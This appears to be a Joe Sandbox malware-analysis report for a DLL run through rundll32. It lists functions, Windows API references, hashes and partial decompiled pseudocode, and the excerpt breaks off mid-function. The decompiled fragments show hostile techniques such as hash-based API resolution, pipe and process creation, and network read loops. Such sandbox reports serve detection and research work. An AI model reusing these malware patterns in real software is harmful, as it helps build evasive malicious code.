Function 0000000180007444 Relevance: 16.6, APIs: 11, Instructions: 146memorystringtimeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,?,00000000,0000000180006222), ref: 0000000180007489
_snprintf.NTDLL ref: 00000001800074BB
lstrlenA.KERNEL32 ref: 00000001800074D7
HeapAlloc.KERNEL32 ref: 000000018000750F
_snprintf.NTDLL ref: 0000000180007540
HeapAlloc.KERNEL32 ref: 000000018000754F
_snprintf.NTDLL ref: 00000001800075B7
memcpy.NTDLL ref: 00000001800075CB
memcpy.NTDLL ref: 00000001800075E2
_snprintf.NTDLL ref: 0000000180007620
HeapFree.KERNEL32 ref: 0000000180007653

Memory Dump Source

Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd

Similarity

API ID: _snprintf$Heap$AllocTimememcpy$FileFreeSystemlstrlen
String ID:
API String ID: 1448584724-0
Opcode ID: 1873a16970b6eb1eb8123085a0dd6b0133f1a5a141746e4d2519f222aa328f56
Instruction ID: 43bd3c41a0e216f1fe2d256970a36843f92bdaad392a56b89b43ab90d53a1bd0
Opcode Fuzzy Hash: 1873a16970b6eb1eb8123085a0dd6b0133f1a5a141746e4d2519f222aa328f56
Instruction Fuzzy Hash: 5851AB36B14A4886EB92CF16E8047DA77A5F78CBC4F558121EE0D83755EF38DA1AC700

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000970C Relevance: 15.2, APIs: 12, Instructions: 177
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 27%

			E0000000118000970C(void* __ebx, long long __rbx, intOrPtr* __rcx, void* __rdx, long long __rsi, void* __r8, void* __r9, signed long long __r11) {
				void* __rdi;
				signed int _t56;
				int _t61;
				intOrPtr _t77;
				intOrPtr _t78;
				struct _CRITICAL_SECTION* _t121;
				long long _t124;
				intOrPtr* _t150;
				struct _CRITICAL_SECTION* _t154;
				long long _t161;
				intOrPtr* _t162;
				void* _t165;
				void* _t166;
				void* _t168;
				signed long long _t177;
				struct _CRITICAL_SECTION* _t179;
				struct _CRITICAL_SECTION* _t183;
				void* _t186;
				void* _t189;
				void* _t190;

				_t177 = __r11;
				_t168 = __r8;
				_t126 = __rbx;
				 *((long long*)(_t165 + 0x10)) = __rbx;
				 *((long long*)(_t165 + 0x18)) = _t161;
				 *((long long*)(_t165 + 0x20)) = __rsi;
				_t166 = _t165 - 0x60;
				_t159 =  *__rcx;
				r14d = r8d;
				_t190 = __rdx;
				_t162 = __rcx;
				 *((long long*)(_t166 + 0x58)) =  *__rcx;
				if ( *((intOrPtr*)(__rcx + 0x70)) -  *((intOrPtr*)(__rcx + 0x50)) < 0) goto 0x80009758;
				E000000011800045E8(__ebx,  *0x8000d4a0, __rbx, __rcx,  *__rcx, __rcx, _t189, _t186);
				EnterCriticalSection(_t183);
				asm("lock add dword [esi+0x40], 0x1");
				LeaveCriticalSection(_t179);
				r11d =  *(_t162 + 0x70) & 0x000000ff;
				_t56 =  *(_t162 + 0x50) & 0x000000ff;
				if (r11d - _t56 >= 0) goto 0x800097e8;
				_t150 =  *((intOrPtr*)( *((intOrPtr*)(_t162 + 0x48)) + _t177 * 8));
				_t77 =  *_t150;
				if (_t77 == dil) goto 0x800097aa;
				if (_t77 == 0x2f) goto 0x800097a5;
				_t78 =  *((intOrPtr*)(_t150 + 1));
				if (_t78 != dil) goto 0x80009796;
				if (_t78 != dil) goto 0x800097ad;
				_t121 = _t154;
				if (_t121 == _t154) goto 0x800097c5;
				if ( *((char*)(_t121 - 1)) != 0x3a) goto 0x800097c5;
				if ( *((char*)(_t121 + 1)) != 0x2f) goto 0x800097c5;
				E00000001180001C00(0, _t126, _t177 + _t150, _t154, _t159, _t162);
				if (_t121 == _t154) goto 0x800097e8;
				 *(_t166 + 0x90) = 0 | _t56 + 0x00000002 == 0x00000008;
				asm("lock add dword [esi+0x40], 0xffffffff");
				if (_t121 == _t154) goto 0x8000996c;
				r9d = 0;
				r8d = r14d;
				 *((long long*)(_t166 + 0x38)) = _t166 + 0x40;
				 *((long long*)(_t166 + 0x30)) = _t166 + 0x48;
				_t24 = _t166 + 0x50; // 0x32
				_t124 = _t24;
				 *((long long*)(_t166 + 0x28)) = _t124;
				 *((intOrPtr*)(_t166 + 0x20)) = 0;
				if (E00000001180006108(_t126, _t162, _t190, _t168) != 0) goto 0x8000995c;
				_t187 =  *_t162;
				EnterCriticalSection(_t154);
				asm("lock inc ecx");
				LeaveCriticalSection(??);
				if ( *((intOrPtr*)(_t162 + 0x18)) == _t154) goto 0x8000986b;
				E00000001180001C00(0, _t126,  *((intOrPtr*)(_t162 + 0x18)), _t154, _t159, _t162);
				goto 0x80009873;
				asm("lock inc ecx");
				if ( *(_t166 + 0x90) == _t154) goto 0x8000993c;
				r14d = lstrlenA(??);
				_t61 = lstrlenA(??);
				_t32 = _t187 + 2; // 0x2
				r15d = _t61;
				E00000001180001C00(_t124 + _t32,  *(_t166 + 0x90), _t121, _t154, _t159, _t162);
				if (_t124 == _t154) goto 0x8000992e;
				_t33 = _t190 + 1; // 0x1
				r8d = _t33;
				 *((char*)( *_t162 + _t124)) = 0x2f;
				memcpy(??, ??, ??);
				dil =  *(_t166 + 0x90) != 0;
				 *((intOrPtr*)(_t166 + 0x38)) = 2;
				 *((long long*)(_t166 + 0x30)) =  *((intOrPtr*)(_t166 + 0xb8));
				 *((long long*)(_t166 + 0x28)) =  *((intOrPtr*)(_t166 + 0xb0));
				 *((intOrPtr*)(_t166 + 0x20)) =  *((intOrPtr*)(_t166 + 0x40));
				if (E000000011800088B4(_t56 + 2,  *(_t166 + 0x90),  *((intOrPtr*)(_t166 + 0x58)), _t124,  *((intOrPtr*)(_t166 + 0xb0)), _t159, _t124,  *((intOrPtr*)(_t166 + 0x50)),  *((intOrPtr*)(_t166 + 0x48))) != 0x10d2) goto 0x80009920;
				asm("sbb eax, eax");
				HeapFree(??, ??, ??);
				HeapFree(??, ??, ??);
				HeapFree(??, ??, ??);
				HeapFree(??, ??, ??);
				HeapFree(??, ??, ??);
				goto 0x80009971;
				return 8;
			}

APIs

EnterCriticalSection.KERNEL32(?,00000000,?,0000000180005069), ref: 000000018000975C
LeaveCriticalSection.KERNEL32(?,0000000180005069), ref: 000000018000976B
EnterCriticalSection.KERNEL32(?,0000000180005069), ref: 0000000180009840
LeaveCriticalSection.KERNEL32(?,0000000180005069), ref: 0000000180009850
lstrlenA.KERNEL32(?,0000000180005069), ref: 0000000180009885
lstrlenA.KERNEL32(?,0000000180005069), ref: 0000000180009891
memcpy.NTDLL(?,0000000180005069), ref: 00000001800098C0

Part of subcall function 00000001800045E8: GetSystemTimeAsFileTime.KERNEL32 ref: 000000018000461B
Part of subcall function 00000001800045E8: LeaveCriticalSection.KERNEL32 ref: 0000000180004653

Part of subcall function 00000001800088B4: memset.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000,0000000180009910,?,0000000180005069), ref: 00000001800088F9

HeapFree.KERNEL32(?,0000000180005069), ref: 0000000180009928
HeapFree.KERNEL32(?,0000000180005069), ref: 0000000180009936
HeapFree.KERNEL32(?,0000000180005069), ref: 0000000180009946
HeapFree.KERNEL32(?,0000000180005069), ref: 0000000180009956
HeapFree.KERNEL32(?,0000000180005069), ref: 0000000180009964

Memory Dump Source

Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd

Similarity

API ID: CriticalFreeHeapSection$Leave$EnterTimelstrlen$FileSystemmemcpymemset
String ID:
API String ID: 4119546182-0
Opcode ID: 2ad9a0bc2d8bc88a4eb816e4b8ea3e44bf3c6b6e7dae9fa03fc2860de6b20740
Instruction ID: 44ed652dd4a090d7685ee9479cd2374acead57c43adb5283d017da8f701a6da5
Opcode Fuzzy Hash: 2ad9a0bc2d8bc88a4eb816e4b8ea3e44bf3c6b6e7dae9fa03fc2860de6b20740
Instruction Fuzzy Hash: F5719436608A8886EBA1CF66E8043DAB7A1F78CBD0F458125FE9D83755DF38C649C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180002F24 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 112memorypipeCOMMON

Download Yara Rule

APIs

HeapAlloc.KERNEL32 ref: 0000000180002F58
memset.NTDLL ref: 0000000180002F7E
CreatePipe.KERNEL32 ref: 0000000180002FB4
GetLastError.KERNEL32 ref: 0000000180002FBE

Strings

.RK, xrefs: 000000018000304E

Memory Dump Source

Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd

Similarity

API ID: AllocCreateErrorHeapLastPipememset
String ID: .RK
API String ID: 2695650488-3354657194
Opcode ID: 3abbf9810bb3c5e620b32a2dd9f1b3a1cda1bf4db2d5332f5b3a00b2673bdb8e
Instruction ID: 378f6602c2b1250aa9488984ecc26cdba5ebabec116acb0dc11713ee51ebb5a5
Opcode Fuzzy Hash: 3abbf9810bb3c5e620b32a2dd9f1b3a1cda1bf4db2d5332f5b3a00b2673bdb8e
Instruction Fuzzy Hash: 4E41AD71314B8982EB93CB66E4613E977A4FB8CBC4F048021EA4987B95DF38D64CCB01

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180005600 Relevance: 10.6, APIs: 7, Instructions: 81memorystringtimeCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32 ref: 0000000180005634
HeapAlloc.KERNEL32 ref: 0000000180005648
GetSystemTime.KERNEL32 ref: 000000018000565F
_snprintf.NTDLL ref: 00000001800056B6
EnterCriticalSection.KERNEL32 ref: 00000001800056C2
LeaveCriticalSection.KERNEL32 ref: 000000018000571B
HeapFree.KERNEL32 ref: 0000000180005729

Memory Dump Source

Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd

Similarity

API ID: CriticalHeapSection$AllocEnterFreeLeaveSystemTime_snprintflstrlen
String ID:
API String ID: 2518601019-0
Opcode ID: 6bbdaee708397e269f1719576e0b408813d3eaae43c78365dabaa5161097e835
Instruction ID: d9d6c815191b5ef41651c0c787a8a8ca67448b671f5da5a3966f0d0395a17d9c
Opcode Fuzzy Hash: 6bbdaee708397e269f1719576e0b408813d3eaae43c78365dabaa5161097e835
Instruction Fuzzy Hash: C9313B36208B8486D795CF12F8447AAB761F789BD5F448026EE8A43B24EF3CD549CB00

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180001D98 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75processmemoryCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 0000000180001DD1

Part of subcall function 00000001800089E4: HeapAlloc.KERNEL32(?,?,?,0000000180006E17,?,?,?,?,00000000,00000001800052B1), ref: 0000000180008A5D

memcpy.NTDLL ref: 0000000180001E66
CreateProcessW.KERNEL32 ref: 0000000180001EA4
GetLastError.KERNEL32 ref: 0000000180001EAE
HeapFree.KERNEL32 ref: 0000000180001EBE

Strings

h, xrefs: 0000000180001E1C

Memory Dump Source

Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd

Similarity

API ID: Heap$AllocCreateErrorFreeLastProcessmemcpymemset
String ID: h
API String ID: 1962595928-2439710439
Opcode ID: 598079d7ebde3786078e4e8496c9395ee778a1e9a6aa669798a3687931c5e084
Instruction ID: 4743b7abae4fc84edbe905cfc6942fba1d9a030ece9545f382f76fd41ef8ffd2
Opcode Fuzzy Hash: 598079d7ebde3786078e4e8496c9395ee778a1e9a6aa669798a3687931c5e084
Instruction Fuzzy Hash: 5E312F32204A89DAE7A1DF16F8447CAB7A4F7887D4F458125EA8D83B54DF78C64ACB40

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180007A7C Relevance: 10.5, APIs: 7, Instructions: 34COMMON

Download Yara Rule

APIs

TerminateProcess.KERNEL32 ref: 0000000180007A9F
CloseHandle.KERNEL32 ref: 0000000180007AA9
CloseHandle.KERNEL32 ref: 0000000180007AB3
CloseHandle.KERNEL32 ref: 0000000180007AC2
CloseHandle.KERNEL32 ref: 0000000180007ACC
CloseHandle.KERNEL32 ref: 0000000180007ADB
CloseHandle.KERNEL32 ref: 0000000180007AE5

Memory Dump Source

Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd

Similarity

API ID: CloseHandle$ProcessTerminate
String ID:
API String ID: 1541851893-0
Opcode ID: 87714ba418a4876f44f41e607543c34b556ed111d7d5074f5947d895b051b476
Instruction ID: 6aea6e80272aa285d695e7919669a58fbc0d4d182d54ab24a0e74719d0bdf862
Opcode Fuzzy Hash: 87714ba418a4876f44f41e607543c34b556ed111d7d5074f5947d895b051b476
Instruction Fuzzy Hash: 27017D35701A49C1EB96DF66D8547A97361FB8CFD5F05C021AE1E82725DE28C64DC701

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800020DC Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 138
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 26%

			E000000011800020DC(long long* __rax, long long __rbx, void* __rcx, intOrPtr* __rdx, long long __rsi) {
				intOrPtr _t43;
				intOrPtr _t44;
				signed int _t45;
				long long* _t81;
				void* _t82;
				void* _t83;
				long long* _t84;
				void* _t104;
				long long _t108;
				void* _t111;
				void* _t112;
				void* _t121;
				int _t123;
				int _t126;
				void* _t129;
				CHAR* _t131;

				_t81 = __rax;
				 *((long long*)(_t111 + 8)) = __rbx;
				 *((long long*)(_t111 + 0x18)) = _t108;
				 *((long long*)(_t111 + 0x20)) = __rsi;
				_t112 = _t111 - 0x1c0;
				_t109 =  *0x8000d4a0;
				r14d = 0;
				 *(_t112 + 0x1f8) = lstrlenA(_t131);
				memset(_t129, _t126, _t123);
				_t6 = _t104 + 1; // 0x1
				_t7 = _t129 + 2; // 0x2
				r11d = _t7;
				r8d = _t6;
				 *__rdx = r11w;
				HeapAlloc(_t104, ??);
				if (__rax == 0) goto 0x80002287;
				memcpy(??, ??, ??);
				_t43 =  *((intOrPtr*)(__rax));
				if (_t43 == dil) goto 0x80002192;
				if (_t43 == 0x3a) goto 0x8000218d;
				_t44 =  *((intOrPtr*)(__rax + 1));
				if (_t44 != dil) goto 0x8000217d;
				if (_t44 != dil) goto 0x80002195;
				_t121 = _t104;
				if (_t121 == _t104) goto 0x800021d9;
				_t8 = _t121 + 1; // 0x1
				 *_t121 = dil;
				if (_t8 == _t104) goto 0x800021d9;
				if (E000000011800038F8(_t8, __rcx, _t112 + 0x1f8) == 0) goto 0x80002279;
				_t45 =  *(_t112 + 0x1f8) & 0x0000ffff;
				asm("ror cx, 0x8");
				 *(__rdx + 2) = _t45;
				if (_t45 == 0) goto 0x80002279;
				E0000000118000459C(0x25fff021, __rax,  *((intOrPtr*)( *0x8000d4a0 + 0x30)));
				if (_t81 == _t104) goto 0x800021f5;
				 *_t81();
				goto 0x800021f8;
				_t82 = _t104;
				if (_t82 != _t104) goto 0x8000224d;
				E0000000118000459C(0xb27f4910, _t82,  *((intOrPtr*)( *0x8000d4a0 + 0x30)));
				if (_t82 == _t104) goto 0x8000221e;
				 *_t82();
				goto 0x80002220;
				if (0 != 0) goto 0x80002249;
				r14d = 1;
				E0000000118000459C(0x25fff021, _t82,  *((intOrPtr*)(_t109 + 0x30)));
				if (_t82 == _t104) goto 0x80002241;
				 *_t82();
				goto 0x80002244;
				_t83 = _t104;
				if (_t83 != _t104) goto 0x8000224d;
				goto 0x8000225f;
				_t84 =  *((intOrPtr*)(_t83 + 0x18));
				 *((intOrPtr*)(__rdx + 4)) =  *((intOrPtr*)( *_t84));
				if (r14d == 0) goto 0x80002279;
				E0000000118000459C(0x9cb92d3f, _t84,  *((intOrPtr*)(_t109 + 0x30)));
				if (_t84 == _t104) goto 0x80002279;
				 *_t84();
				HeapFree(??, ??, ??);
				return 1;
			}

APIs

lstrlenA.KERNEL32 ref: 0000000180002117
memset.NTDLL ref: 0000000180002136
HeapAlloc.KERNEL32 ref: 0000000180002151
memcpy.NTDLL ref: 000000018000216C
HeapFree.KERNEL32 ref: 0000000180002281

Strings

lJu, xrefs: 0000000180002129

Memory Dump Source

Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd

Similarity

API ID: Heap$AllocFreelstrlenmemcpymemset
String ID: lJu
API String ID: 1735321128-4100297759
Opcode ID: d5c37469df4fda8eac190539a58a31bd497cd0413708541462a44a7583b64b03
Instruction ID: f04020e7afacaa342a0f02f17fd00bf906b29f7f5bb121ef27d08f96d68cd7ee
Opcode Fuzzy Hash: d5c37469df4fda8eac190539a58a31bd497cd0413708541462a44a7583b64b03
Instruction Fuzzy Hash: D7510C32304A9C96EAE3DBA299143EA7792F78CBC4F59C021FE5947755DD39CE898300

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180005DF8 Relevance: 9.1, APIs: 6, Instructions: 131
memoryCOMMON

Download Yara Rule

C-Code - Quality: 27%

			E00000001180005DF8(long long __rbx, intOrPtr* __rcx, void* __r8) {
				signed long long _t88;
				long _t111;
				void* _t114;
				long _t117;
				void* _t121;
				void* _t122;
				long _t130;
				void* _t133;

				 *((long long*)(_t121 + 0x18)) = __rbx;
				_t122 = _t121 - 0x30;
				_t88 =  *0x8000d4a0;
				r13d = 0;
				 *(__rcx + 0x5c) = r13d;
				 *(_t122 + 0x68) = r13d;
				if ( *((intOrPtr*)(__rcx + 0x58)) != r13d) goto 0x80005fbc;
				 *(_t122 + 0x60) = 4;
				E0000000118000459C(0x5431d47a, _t88,  *((intOrPtr*)( *__rcx + 0x50)));
				if (_t88 == _t133) goto 0x80005e56;
				 *_t88();
				goto 0x80005e59;
				if (r13d == r13d) goto 0x80005fb4;
				E0000000118000459C(0xbe782669, _t88,  *((intOrPtr*)( *__rcx + 0x50)));
				if (_t88 == _t133) goto 0x80005e9d;
				_t10 = _t122 + 0x68; // 0xa
				r8d = 0;
				 *((long long*)(_t122 + 0x28)) = _t10;
				 *((long long*)(_t122 + 0x20)) = _t122 + 0x60;
				 *_t88();
				goto 0x80005ea0;
				if (r13d == r13d) goto 0x80005fb4;
				 *(_t122 + 0x68) = r13d;
				 *(_t122 + 0x60) = r13d;
				E0000000118000459C(0xbe782669, _t88,  *((intOrPtr*)( *__rcx + 0x50)));
				if (_t88 == _t133) goto 0x80005eea;
				_t19 = _t122 + 0x68; // 0xa
				r9d = 0;
				r8d = 0;
				 *((long long*)(_t122 + 0x28)) = _t19;
				 *((long long*)(_t122 + 0x20)) = _t122 + 0x60;
				 *_t88();
				r8d =  *(_t122 + 0x60);
				HeapAlloc(_t133, _t130, _t111);
				if (_t88 == _t133) goto 0x80005fad;
				E0000000118000459C(0xbe782669, _t88,  *((intOrPtr*)( *__rcx + 0x50)));
				if (_t88 == _t133) goto 0x80005f43;
				_t27 = _t122 + 0x68; // 0xa
				r8d = 0;
				 *((long long*)(_t122 + 0x28)) = _t27;
				 *((long long*)(_t122 + 0x20)) = _t122 + 0x60;
				 *_t88();
				goto 0x80005f46;
				if (r13d == r13d) goto 0x80005f95;
				 *(_t122 + 0x60) =  *(_t122 + 0x60) >> 1;
				 *((intOrPtr*)(_t88 + _t88 * 2)) = r13w;
				r8d =  *(_t122 + 0x60);
				HeapAlloc(_t114, _t117);
				if (_t88 == _t133) goto 0x80005f8e;
				r8d =  *(_t122 + 0x60);
				r8d = r8d + 1;
				wcstombs(??, ??, ??);
				 *(__rcx + 0x20) = _t88;
				goto 0x80005f9d;
				goto 0x80005f9d;
				GetLastError();
				HeapFree(??, ??, ??);
				goto 0x80005fbc;
				goto 0x80005fbc;
				return GetLastError();
			}

APIs

Part of subcall function 000000018000459C: SetLastError.KERNEL32 ref: 00000001800045D8

HeapAlloc.KERNEL32 ref: 0000000180005EF8
HeapAlloc.KERNEL32 ref: 0000000180005F67
wcstombs.NTDLL ref: 0000000180005F83
HeapFree.KERNEL32 ref: 0000000180005FA5

Memory Dump Source

Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd

Similarity

API ID: Heap$Alloc$ErrorFreeLastwcstombs
String ID:
API String ID: 4133724704-0
Opcode ID: 153f03945acc7980eafc6a68c3935249d809b24ea8f0d96ec6fa36ed55d54185
Instruction ID: a4f29d9b70dc603b3f8cc85abbd9ea91cf1cef2a8837b32e5229c32126143bc8
Opcode Fuzzy Hash: 153f03945acc7980eafc6a68c3935249d809b24ea8f0d96ec6fa36ed55d54185
Instruction Fuzzy Hash: 3F515A36204A8887E7A1DB52E4403AF7761F78C7C9F548521BA8D87B54DF38D65D8B00

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180003FCC Relevance: 9.1, APIs: 6, Instructions: 125
memorysynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 18%

			E00000001180003FCC(intOrPtr* __rcx) {
				void* __rbx;
				void* __rbp;
				long long* _t84;
				long long* _t85;
				void* _t87;
				intOrPtr* _t106;
				void* _t109;

				_t84 =  *0x8000d4a0;
				_t106 = __rcx;
				 *(_t109 + 0x58) =  *(_t109 + 0x58) & 0;
				E0000000118000459C(0x3a7e805d, _t84,  *((intOrPtr*)( *__rcx + 0x50)));
				if (_t84 == 0) goto 0x8000400e;
				 *_t84();
				goto 0x80004010;
				if (0 == 0) goto 0x80004151;
				if ( *((intOrPtr*)(_t109 + 0x50)) == 0) goto 0x8000414c;
				 *0x8000d028();
				if (0 != 0) goto 0x80004145;
				r8d = 0x1000;
				HeapAlloc(??, ??, ??);
				if (_t84 == 0) goto 0x80004133;
				E0000000118000459C(0x3cd8e449, _t84,  *((intOrPtr*)( *__rcx + 0x50)));
				if (_t84 == 0) goto 0x8000408d;
				r8d = 0x1000;
				r8d =  <  ?  *((void*)(_t109 + 0x50)) : r8d;
				 *_t84();
				goto 0x8000408f;
				if (0 == 0) goto 0x800040b7;
				r8d =  *(_t109 + 0x58);
				r9d = 0;
				_t85 =  *((intOrPtr*)( *((intOrPtr*)(_t109 + 0x60))));
				 *((intOrPtr*)(_t85 + 0x20))();
				r11d =  *(_t109 + 0x58);
				 *((intOrPtr*)(_t109 + 0x50)) =  *((intOrPtr*)(_t109 + 0x50)) - r11d;
				if (0 == 0) goto 0x800040bf;
				goto 0x80004059;
				GetLastError();
				if (WaitForSingleObject(??, ??) == 0) goto 0x8000410b;
				E0000000118000459C(0x3a7e805d, _t85,  *((intOrPtr*)( *__rcx + 0x50)));
				if (_t85 == 0) goto 0x800040ef;
				 *_t85();
				goto 0x800040f1;
				if (0 == 0) goto 0x80004101;
				if ( *((intOrPtr*)(_t109 + 0x50)) == 0) goto 0x80004110;
				goto 0x80004059;
				GetLastError();
				goto 0x80004110;
				HeapFree(??, ??, ??);
				if (0x102 != 0) goto 0x80004138;
				E000000011800085E4(_t87, __rcx,  *((intOrPtr*)(_t109 + 0x60)));
				goto 0x80004138;
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t109 + 0x60)))) + 0x10))();
				goto 0x80004166;
				goto 0x80004166;
				 *(_t106 + 0x60) =  *(_t106 + 0x60) & 0x00000008;
				goto 0x80004166;
				if (GetLastError() != 0x2efe) goto 0x80004166;
				 *(_t106 + 0x60) =  *(_t106 + 0x60) & 0x00000000;
				return 0;
			}

APIs

Part of subcall function 000000018000459C: SetLastError.KERNEL32 ref: 00000001800045D8

HeapAlloc.KERNEL32 ref: 0000000180004047
GetLastError.KERNEL32 ref: 00000001800040B7
WaitForSingleObject.KERNEL32 ref: 00000001800040C5
GetLastError.KERNEL32 ref: 0000000180004101
HeapFree.KERNEL32 ref: 0000000180004118

Memory Dump Source

Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd

Similarity

API ID: ErrorLast$Heap$AllocFreeObjectSingleWait
String ID:
API String ID: 2540544816-0
Opcode ID: 2125c37f1b6f3d76281b7aab6874424e369f3f46deb369ce77790706a182fef6
Instruction ID: f07a79ff2e09cda6f9955aa739d580884efaaa7540e40516afedcf37a36379f0
Opcode Fuzzy Hash: 2125c37f1b6f3d76281b7aab6874424e369f3f46deb369ce77790706a182fef6
Instruction Fuzzy Hash: B54143B330464986EB92DB66D8403EA73A1F78CBD1F048425BE498BB95DF78C68DC714

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800091F8 Relevance: 9.1, APIs: 6, Instructions: 80
timeCOMMON

Download Yara Rule

C-Code - Quality: 45%

			E000000011800091F8(void* __ecx, long long __rbx, signed long long __rcx, signed long long __rdx, long long __rsi, void* __rbp, void* __r9, signed long long* _a8, void* _a16, void* _a24) {
				void* _t46;
				long _t52;
				void* _t54;
				signed long long _t67;
				long long _t69;
				signed long long* _t73;
				signed long long _t80;
				signed long long _t87;
				intOrPtr _t90;
				struct _FILETIME* _t91;
				void* _t98;
				void* _t103;
				signed long long _t104;
				signed long long* _t105;

				_t103 = _t98;
				 *((long long*)(_t103 + 0x10)) = __rbx;
				 *((long long*)(_t103 + 0x18)) = __rsi;
				 *(_t103 + 8) =  *(_t103 + 8) & 0x00000000;
				 *((long long*)(_t103 - 0x18)) = _t103 + 8;
				_t46 =  *((intOrPtr*)(__rcx + 0xa0))();
				_t73 = _a8;
				if (_t73 == 0) goto 0x8000925e;
				_t87 = _t73 + 0x18;
				 *(_t73 + 0x20) = _t87;
				_a8[3] = _t87;
				_a8[2] = __rcx;
				_a8[1] = __rdx;
				 *_a8 =  *_a8 | 0xffffffff;
				if (_t46 != 0) goto 0x80009327;
				GetSystemTimeAsFileTime(_t91);
				EnterCriticalSection(??);
				_t104 = __rcx + 0x88;
				_t80 =  *(_t104 + 8);
				_a8[3] = _t104;
				_a8[4] = _t80;
				 *_t80 =  &(_a8[3]);
				_t67 =  &(_a8[3]);
				 *(_t104 + 8) = _t67;
				LeaveCriticalSection(??);
				asm("lock add dword [edi+0x40], 0x1");
				E00000001180006C8C(__ecx, _t67, __rbx, 0x180004c4c, _a8, __rdx, __rbp,  &(_a8[7]));
				_a8[6] = _t67;
				if (_a8[6] != 0) goto 0x80009331;
				_t52 = GetLastError();
				EnterCriticalSection(??);
